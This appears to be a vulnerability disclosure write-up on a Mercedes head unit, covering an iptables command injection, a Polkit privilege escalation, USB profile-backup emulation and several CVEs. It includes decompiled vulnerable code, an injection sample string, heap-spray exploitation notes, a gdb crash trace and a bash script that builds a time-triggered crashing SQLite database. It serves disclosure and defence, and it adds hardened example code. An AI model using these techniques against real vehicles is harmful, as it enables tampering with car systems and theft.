MonitorService.TimestampEnable = 1
MonitorService.ReceiveEnable = 1
MonitorService.MonitoringEnable = 1
MonitorService.MessageBufferSize = 1000
MonitorService.MessageBufferMemory = 512000
#1-file, 2-dlt, 3-both
MonitorService.LogMode = 2
#MonitorService.LogMode = 0
MonitorService.LogFileSize = -1
MonitorService.LogFileName = /tmp/wicom.log
MonitorService.LinefeedEnable = 1
MonitorService.HeaderEnable = 1
MonitorService.FileHeaderEnable = 1
#RH
MonitorService.Port = 2021
The “MonitorService.Port” variable holds the number of the TCP port used by the server. The “MonitorService.ReceiveEnable” variable defines whether the server handles requests from clients. With the head unit’s configuration, “MonitorService” can therefore receive GCF messages from a client and pass them on through the GCF router.
The list of registered services in the GCF router includes “NetworkingService”. It has the following registered handlers:
The “NWS_PF_setMacAddrExceptionIP” handler adds rules to the firewall policy. It uses the following arguments:
- macAddress – the MAC address for the rule;
- direction – the direction of the rule: inbound or outbound;
- fate – the type of rule: allow or deny;
- command – the action to be performed: add the rule to the policy or remove it.
The control flow for processing this request spans the following binaries: “MonitorService”, “libwicome_monitorservice.so” and “libwicode_gcf_core.so”. The call stack is the following:
sub_EE6E8 (NWS_PF_setMacAddrExceptionIP)
sub_E9D0C (sNWS_PF_setMacAddrExceptionIP)
sub_F275C (CGCFStub_PF::setMacAddrExceptionIP)
sub_F7AF4 (CGCFStub_PF::_int_setMacAddrExceptionIP)
snprintf
sub_F7EB4 (systemExec)
system
The sub_F7AF4 function executes the system() call with arguments for the iptables binary:
/* ... */
if ( v10 )
{
v11 = (const char *)PAL::CString::raw(direction);
v12 = (const char *)PAL::CString::raw(mac); /* the MAC address is taken from the request as-is */
if ( snprintf(v22, 0xFFuLL, "iptables -%s %s -m mac --mac-source %s -j %s ", (const char *)&v21, v11, v12, v20) < 0 )
{
/* ... */
v18 = 0;
}
if ( v18 )
{
if ( (unsigned __int8)systemExec(a1, v22) != 1 )
{
/* ... */
return 0;
}
}
}
/* ... */
When the request is processed, the MAC address is neither validated nor restricted. That means an attacker can perform command injection during the iptables command execution.
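The same handler written defensively, as an added example rather than the vendor’s code: the MAC address is checked against a strict pattern, the other three fields against allow-lists, and iptables is invoked with an argument vector instead of a shell string, so request content never reaches a shell parser. The mapping of request values to iptables chains and targets (inbound/INPUT, allow/ACCEPT and so on) is an assumption for the example; the page does not document the real one.

```python
import re
import subprocess
from typing import List

# Mirrors the snprintf() format from the decompiled handler above. All four %s
# values come straight from the request, which is what makes it injectable.
_VULNERABLE_FORMAT = "iptables -%s %s -m mac --mac-source %s -j %s "


def vulnerable_command_string(command: str, direction: str, mac: str, fate: str) -> str:
    """Builds the command exactly as the flawed handler does: no validation.
    Shown only for contrast; its output must never be handed to system()."""
    return _VULNERABLE_FORMAT % (command, direction, mac, fate)


# Allow-lists for the three enumerated fields. The request-value -> iptables
# mapping is assumed for this example.
_COMMANDS = {"add": "A", "remove": "D"}
_DIRECTIONS = {"inbound": "INPUT", "outbound": "OUTPUT"}
_FATES = {"allow": "ACCEPT", "deny": "DROP"}
# Exactly six colon-separated hex octets, nothing else.
_MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def normalize_mac(mac: str) -> str:
    """Accept only a canonical MAC address; reject everything else before it can
    get anywhere near a command line."""
    if not _MAC_RE.match(mac):
        raise ValueError(f"invalid MAC address: {mac!r}")
    return mac.lower()


def build_iptables_argv(command: str, direction: str, mac: str, fate: str) -> List[str]:
    """Return the iptables invocation as an argv list (no shell, no string
    interpolation), with every field checked against its allow-list."""
    try:
        flag, chain, target = _COMMANDS[command], _DIRECTIONS[direction], _FATES[fate]
    except KeyError as exc:
        raise ValueError(f"unexpected request field: {exc.args[0]!r}") from None
    return ["iptables", f"-{flag}", chain, "-m", "mac", "--mac-source",
            normalize_mac(mac), "-j", target]


def apply_rule(command: str, direction: str, mac: str, fate: str, runner=subprocess.run):
    """Execute the validated argv without a shell. `runner` is injectable so the
    function can be exercised without root or iptables installed."""
    argv = build_iptables_argv(command, direction, mac, fate)
    return runner(argv, check=True)


def is_safe_request(command: str, direction: str, mac: str, fate: str) -> bool:
    """True only if all four fields pass validation."""
    try:
        build_iptables_argv(command, direction, mac, fate)
        return True
    except ValueError:
        return False


# Constructed sample inputs: one valid MAC, one carrying shell metacharacters.
GOOD_MAC = "AA:bb:cc:dd:ee:ff"
BAD_MAC = "aa:bb:cc:dd:ee:ff; echo injected"

if __name__ == "__main__":
    print(build_iptables_argv("add", "inbound", GOOD_MAC, "allow"))
    print(is_safe_request("add", "inbound", BAD_MAC, "allow"))
```

Two properties matter here: the validation is positive (a fixed grammar and fixed enumerations, not a blacklist of dangerous characters), and the execution path has no shell at all, so even a validation gap cannot become a second command.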
Privilege escalation
The head unit uses an outdated version of Polkit, which is vulnerable to CVE-2021-4034. This is a local privilege escalation vulnerability that can result in unprivileged users gaining administrative rights on the target machine. There are a lot of publicly available exploits targeting it, enabling the execution of arbitrary commands as the user “phone” of group “comm”.
After successfully exploiting this vulnerability, an attacker can run commands to modify network interfaces, mount filesystems, and perform other privileged activities. Although some restrictions are imposed, a potential attacker can access the systemd command to escalate their privileges further.
The root filesystem partition is mounted read-only. As mentioned in the KeenLab research, the head unit doesn’t have any disk integrity protection features enabled. That means the filesystem can be remounted with read and write rights, and the bash scripts that run during start-up can be modified.
USB
USB is the most popular attack vector when physical access is available. The head unit is built on a microservice architecture in which each service is fairly isolated and communicates through an API. Each microservice of the head unit provides some internal functionality and one or more thriftme services through which other microservices communicate with it. This makes it possible to emulate the USB subsystem with the QEMU user-mode emulator.
Preparation
The “DeviceManager” service is responsible for handling USB events: adding, removing, mounting or updating. Other services can subscribe to “DeviceManager” and use notify callbacks to perform actions when USB events occur. For example, such a service can start searching for specific files when the USB filesystem is mounted.
The “GDVariantCodingService” service is a frontend of variant coding. Other services use it to identify the parameters of the head unit and car.
Both of these services have to be emulated to run a self-hosted USB subsystem, which can be done by emulating the corresponding thriftme services. So, for successful emulation, we perform the following actions:
- Prepare the network for the IP addresses used by the services.
- The services “DeviceManager” and “GDVariantCodingService” use UNIX sockets for transport. To emulate them, it is easier to use TCP sockets so that we do not depend on the filesystem; forward between the two with socat.
- Run the emulated thriftme services. In our case, we created devicemgr.py, vehicle.py and varcoding.py. In devicemgr.py, mounting of the USB filesystem is emulated at the path “/opt/sys/bin/aaaaa”.
- Use QEMU user emulation in a “transparent” fashion.
- In the chroot environment, prepare the folders and devices.
After these steps, the USB subsystem is emulated.
Emulation of data export, import and tracing
The head unit has the functionality to import or export user profile files (seat position, favorite radio stations, etc.) to or from USB storage. This task is handled by the “UserData” service, more precisely by the thriftme service “CSystemProfileServiceImpl”.
The user profiles backup looks like a folder with the following directory structure:
.
└── MyMercedesBackup
    ├── shared
    ├── system
    │   ├── rse.ud2
    │   └── system.ud2
    └── udxprofiles
        ├── profile0
        │   ├── commuterroute.ud2
        │   ├── emotions.ud2
        │   ├── navidata.ud2
        │   ├── pud.ud2
        │   ├── uapreds.ud2
        │   ├── vt_ab.ud2
        │   └── vt_tuner.ud2
        └── profileindex.xml
Some of the files are generated by “UserData” itself, but most of them are generated and processed by other services, like “CAPServer”. The most important component of the data import and export processes is the thriftme service “UserDataExchangeService” in “UserData”. Services subscribe to notifications about data import and export in “UserDataExchangeService”.
“CSystemProfileServiceImpl” performs the following workflow when exporting the profile backup:
- Run timer for 100 seconds.
- Notify client services through “UserDataExchangeService” using events that request data export. Such events contain the information about the exported data.
- Services call API functions that confirm the success of the data export; their arguments are a data key and a path to the file.
- “UserData” collects all received files, encodes them and stores them in the mounted USB filesystem.
The scheme is similar for the profile backup import:
- “UserData” copies files from the USB to the local system and decodes them.
- It notifies client services through events that request data import.
- If the client service is handling the data key, it imports the data.
- Services call API functions that verify the success of the data import.
The backup contains XML files and binary files. Binary files are considered more useful for vulnerability hunting:
| Data key | Filename in backup | Content |
| --- | --- | --- |
| PUD_COMMUTER | commuterroute.ud2 | ISO-8859 text, with no line terminators |
| PUD_UAPREDICTIONSDATA | uapreds.ud2 | SQLite 3.x database |
| PUD_VT_TUNER | vt_ab.ud2 | Proprietary binary data |
| PUD_VT_ADDRESSBOOK | vt_tuner.ud2 | Proprietary binary data |
To trigger backup import (restore) and export (backup), we created the scripts triggerRestore.py and triggerBackup.py.
Almost all the services of the head unit support the HBTracePersistence trace system, which allows tracing to be turned on and off for a specific module or function.
The “hbtc” file contains the tracing system configuration and determines the function tracing method. An example of the “hbtc” file is provided below:
HBTracePersistence 1.0.0
imp 00 08
imp_userdata_private_CSystemProfileManager ff 08
imp_userdata_private_CUserDataVehicleInformationAdapter ff 08
imp_userdata_private_CUserDataIF2Impl ff 08
imp_common_streamhelper_StreamHelper ff 08
imp_userdata_private_CUDXStructure ff 08
As mentioned previously, files in the backup are encoded with a proprietary algorithm, which is handled by the “CPUserDataEncodingHandler” class. We prepared the script ud2codec.py to encode and decode such files.
Identified vulnerabilities
The following vulnerabilities were tested on a real car.
CVE-2024-37601
The process of decoding files with the *.ud2 extension contains a heap buffer overflow vulnerability.
“UserData” represents encoded data as a “CHBString” object, which processes the data as a UTF string. The UD2-specific decoding characters then have to be deleted while their indexes remain constant. For this task, “CHBString::const_iterator::incrementSteps” is used to obtain a pointer to the desired character, and “CHBString::remove” to remove the character from the string. “CHBString::const_iterator::incrementSteps” processes the character with code 0xe7 incorrectly: it treats it as a 1-byte character. But according to the “UTF8LookUpTable” table, which is used in “CHBString::remove” and “CHBString::CHBString”, the character with code 0xe7 is encoded with 3 bytes.
As a result, when “CHBString::remove” runs, the calculated pointer can lie outside the buffer allocated after UTF decoding with “UTF8LookUpTable”, and memmove is called with a third argument (the buffer size) equal to -1.
Even without further exploitation, this vulnerability crashes the “UserData” service during data import. This leaves the system in a frozen state that can be fixed only by a hard reset of the ECU.
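To show the bug class in isolation, here is an added Python model (not the CHBString code) of two routines that disagree on how many bytes the sequence introduced by 0xe7 occupies, alongside a remove function that validates the iterator’s offset before touching the buffer. The lead-byte table is constructed from the UTF-8 rules rather than taken from the binary, and the sample string, function names and error handling are assumptions for the example.

```python
from typing import Callable


def utf8_seq_len(lead: int) -> int:
    """Length of the UTF-8 sequence introduced by `lead`, in bytes. Plays the
    role of the lookup table that the string constructor and remove() share."""
    if lead < 0x80:
        return 1
    if 0xC2 <= lead <= 0xDF:
        return 2
    if 0xE0 <= lead <= 0xEF:
        return 3          # 0xE7 is in this range: a three-byte sequence
    if 0xF0 <= lead <= 0xF4:
        return 4
    raise ValueError(f"0x{lead:02x} is not a valid UTF-8 lead byte")


def increment_steps(buf: bytes, steps: int) -> int:
    """Consistent iterator: byte offset of the `steps`-th character, using the
    same length table as everything else and refusing to walk off the end."""
    off = 0
    for _ in range(steps):
        if off >= len(buf):
            raise IndexError("iterator ran past the end of the buffer")
        off += utf8_seq_len(buf[off])
    return off


def buggy_increment_steps(buf: bytes, steps: int) -> int:
    """Models the flawed iterator: a 0xE7 lead byte is stepped over as a single
    byte, so the returned offset can land inside a multi-byte sequence."""
    off = 0
    for _ in range(steps):
        lead = buf[off]
        off += 1 if lead == 0xE7 else utf8_seq_len(lead)
    return off


StepFn = Callable[[bytes, int], int]


def remove_char(buf: bytes, index: int, step_fn: StepFn = increment_steps) -> bytes:
    """Remove the `index`-th character. The offset handed back by the iterator is
    checked to be inside the buffer and on a lead byte before the tail length is
    computed, so a disagreeing iterator cannot become an out-of-bounds move."""
    start = step_fn(buf, index)
    if not 0 <= start < len(buf):
        raise IndexError(f"offset {start} outside buffer of {len(buf)} bytes")
    if 0x80 <= buf[start] <= 0xBF:
        raise ValueError(f"offset {start} points into a multi-byte sequence")
    end = start + utf8_seq_len(buf[start])
    if end > len(buf):
        raise ValueError("truncated sequence at end of buffer")
    return buf[:start] + buf[end:]


def remove_ok(buf: bytes, index: int, step_fn: StepFn = increment_steps) -> bool:
    """True if remove_char() accepts the iterator's offset for this input."""
    try:
        remove_char(buf, index, step_fn)
        return True
    except (IndexError, ValueError):
        return False


# Constructed sample: 'a', U+7B54 (encoded E7 AD 94), 'b', 'c' -> six bytes.
SAMPLE = "a答bc".encode("utf-8")

if __name__ == "__main__":
    print(increment_steps(SAMPLE, 2), buggy_increment_steps(SAMPLE, 2))
    print(remove_char(SAMPLE, 2))
```

The fix that matters is not the table value itself but the invariant: every routine that walks the string must use one length table, and the consumer of an iterator offset must re-check it against the buffer it actually owns.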
CVE-2023-34402
As mentioned previously, the vt_ab.ud2 file was decoded as vt_ab.xml during the profile backup export for vulnerability searching. Its contents resemble a binary, and it is processed by the text-to-speech service.
The vt_ab.xml file contains another file describing which service will be dropped during processing; to do this, it contains the name of the file to drop. This action is performed in the “UserDataExchangeServiceClient::unpackVoiceTagArchiveOptimized” function:
- get the content of the file describing what to drop;
- get the name of the file to drop and perform the drop.
Because no checks are performed, an attacker controls the path to which controllable content is written. As a result, the attacker gains an arbitrary file write with the same rights the service has.
CVE-2023-34399
After decoding, the uapreds.ud2 file in the profile folder “MyMercedesBackup/udxprofiles/profile0” takes the form of uapreds.db. The system recognizes it as an SQLite database, which is parsed in the service that uses machine learning to create efficient routes. The decoded file is processed in “capthrift::CapServer::requestImportBinaryData”, which then calls “capthrift::CapServer::setProfile” to load the database.
All values in the SQLite database tables are serialized as Boost serialization archives. The archive format can be either XML or plain text; we used the plain text mode. Here is an example of an archive from the learning_kernel row of the kvpair_table table:
22 serialization::archive 11 0 2 0 1 0 0 1 0 1 0 0 0 0 1
0.00000000000000000e+00 0 0 0 0 0 0 0 0 1.00000000000000000e+00
...
The latest publicly available version of the Boost library at the time of research, 1.81, contains an integer overflow vulnerability, which can be triggered when processing an entity pointer:
In (1), the value cid is obtained from attacker-controllable data. In (2), this value is used as an array index to get the cobject_id object. (3.1) and (3.2) introduce restrictions on cid:
- whether the value of cid equals -1;
- whether the value of cid is greater than the size of the cobject_id_vector array.
These restrictions can be bypassed through the value assigned to cid, because class_id_type is defined as an integer type:
So if we assign the value -3 to cid, the pointer co.bpis_ptr in (2) will be corrupted.
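An added Python model of the two index checks described at (3.1) and (3.2) and of the element address computation that the debugger session below makes visible. The entry size 0x18 and the vector base and size values are taken from that session; the function names are assumptions for the example, and none of this is the Boost code itself. It shows why a signed index needs a lower bound as well as an upper one.

```python
from typing import Callable, Optional

ENTRY_SIZE = 0x18  # size of one cobject_id entry, as used in the gdb session

# Values read from the gdb output on the page (not constructed).
GDB_VECTOR_BASE = 0x405C017F00   # cobject_id_vector data pointer
GDB_VECTOR_SIZE = 0x0E           # cobject_id_vector size


def flawed_lookup_allowed(cid: int, vector_size: int) -> bool:
    """The checks described at (3.1) and (3.2): reject -1 and reject values
    greater than the vector size. Every other negative value passes."""
    if cid == -1:
        return False
    if cid > vector_size:
        return False
    return True


def safe_lookup_allowed(cid: int, vector_size: int) -> bool:
    """A signed index is valid only in the half-open range [0, size)."""
    return 0 <= cid < vector_size


def entry_address(vector_base: int, cid: int) -> int:
    """Address of cobject_id_vector[cid] in a 64-bit process: base + cid*0x18.
    With a negative cid this lands below the vector, in whatever the heap
    happened to place before it."""
    return vector_base + cid * ENTRY_SIZE


def resolve(cid: int, vector_base: int, vector_size: int,
            check: Callable[[int, int], bool] = safe_lookup_allowed) -> Optional[int]:
    """Return the entry address if `check` admits cid, otherwise None."""
    if not check(cid, vector_size):
        return None
    return entry_address(vector_base, cid)


if __name__ == "__main__":
    for cid in (0, 0x0D, 0x0E, -1, -3):
        print(cid,
              hex(resolve(cid, GDB_VECTOR_BASE, GDB_VECTOR_SIZE, flawed_lookup_allowed) or 0),
              resolve(cid, GDB_VECTOR_BASE, GDB_VECTOR_SIZE))
```

With cid = -3 the flawed checks admit the value and the computed address is 0x405c017eb8, exactly the location the gdb session dereferences; the range check returns None for the same input.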
Lastly, the triggered vulnerability in the debugger looks as follows:
Thread 63 hit Breakpoint 2, 0x0000004002f3cea4 in ?? ()
# cid value
(gdb) i r x2
x2 0xfffffffffffffffd -3
# cobject_id_vector size
(gdb) x/1hx $x20 + 0x58
0x405c01b278: 0x000e
# cobject_id_vector pointer
(gdb) x/1gx $x20 + 0x60
0x405c01b280: 0x000000405c017f00
# 1 element in the cobject_id_vector
(gdb) x/3gx *(void **)($x20 + 0x60) + 0 * 0x18
0x405c017f00: 0x000000400147f1c8 0x0000000000000000
0x405c017f10: 0x0000010000000002
# referenced element
(gdb) x/3gx *(void **)($x20 + 0x60) + -3 * 0x18
0x405c017eb8: 0x5f72696170766b5f 0x00315f656c626174
0x405c017ec8: 0x0000000000000035
(gdb) c
Continuing.
Thread 63 received signal SIGSEGV, Segmentation fault.
Exploitation notes
At the first stage, it is assumed that the image base address is fixed and the vulnerable code is loaded at a specific address in memory. We analyzed the vulnerable code and checked exactly how all the pointers are dereferenced and where the virtual call is performed. Here are the steps:
- By controlling the id, we can move the pointer to negative offsets relative to the beginning of the array in the heap;
- By moving the pointer, we reach an address where another address containing an object for bis_ptr is located;
- The address for bis_ptr should contain the address of the virtual call table.
Controlling only the offset to the corresponding object, we need to reach an address in the heap which contains a pointer to the pointer with the associated virtual table.
We can implement such a scenario with a spray of DDL entries inside the SQLite database we control. For such a spray, we need to create a lot of tables with long names. As a result, structures of the proper format appear in the heap, and a negative index lets us reach them.
Below is an example of such an SQLite-based file (the entry in sqlite_schema is a table creation request):
So we can create a lot of tables with long names, which gives us a heap spraying primitive.
Using the heap spraying technique, an attacker can fully control the execution:
To import the uapreds.db database into the “CAPServer” service, we need to copy it to the service’s working directory, from which “CAPServer” then tries to load the database. As a result, if an attacker manages to import a database which triggers the vulnerability in the head unit, each start-up of “CAPServer” will try to load it and crash. The “CAPServer” service is started by “systemd” and is configured as follows:
[Service]
ExecStart=/opt/prediction/bin/CAPServer /var/opt/prediction/
ExecStop=/bin/kill $MAINPID
Environment=LD_LIBRARY_PATH=/opt/sys/lib
EnvironmentFile=/opt/etc/lisa_env
Type=notify
WatchdogSec=30
Restart=on-failure
RestartSec=2
This means that after the crash, “systemd” will try to restart “CAPServer”. This results in an endless loop of service crashes, which can be helpful when trying to brute force the image base address.
Inside the SQLite database, the schema (the sqlite_schema table) stores the SQL statements used to create tables and views. This feature can be used to make the data returned from a table depend on the current time. The following script automates the creation of an SQLite database which triggers this vulnerability or not according to the current time:
#!/bin/bash
DBPATH=test.db
# SQLite's TIME() returns UTC; the -2 hours offset compensates for the local
# timezone as in the original script. Switch behaviour 10 seconds from now.
STOP_TIME=$(date --date='-2 hours +10 seconds' +"%H:%M:%S")
echo "Trigger until < $STOP_TIME, clean after >= $STOP_TIME"
poc_value="CRASH the system"
clean_value="system work"

# Print the database's idea of the time and the row the view currently yields.
check() {
    sqlite3 "$DBPATH" << EOF
SELECT strftime('Time of database: %H:%M:%S', 'now');
SELECT * FROM target_table;
.exit
EOF
}

rm -f "$DBPATH"
# The view's definition lives in sqlite_schema; which branch of the UNION
# returns a row is decided by TIME() at query time, not at creation time.
sqlite3 "$DBPATH" << EOF
CREATE VIEW target_table AS
  SELECT 'key' AS varkey, '$poc_value' AS varval WHERE TIME() < '$STOP_TIME'
  UNION
  SELECT 'key' AS varkey, '$clean_value' AS varval WHERE TIME() >= '$STOP_TIME';
.exit
EOF
check
sleep 10
check
As a result, an attacker can run image base address brute forcing for some time.
Attack vectors
During our research, we managed to compromise the testbed of the head unit and found several vulnerabilities in a real car via physical access.
The testbed compromise has three potential use cases:
- a criminal wanting to disable the anti-theft protection in a stolen head unit;
- a car owner tuning and unlocking prepaid services on their vehicle;
- a pentester conducting research to find new vulnerabilities.
In the case of a real car, the identified vulnerabilities can be triggered through an exposed USB service that is available to the general user.
Vulnerability list
During the process of vulnerability disclosure with the vendor, the following CVE IDs were assigned:
CVE-2024-37602
CVE-2024-37600
CVE-2024-37603
CVE-2024-37601
CVE-2023-34406
CVE-2023-34397
CVE-2023-34398
CVE-2023-34399
CVE-2023-34400
CVE-2023-34401
CVE-2023-34402
CVE-2023-34403
CVE-2023-34404
The CVE details will be published here: github.com/klsecservices/Advis….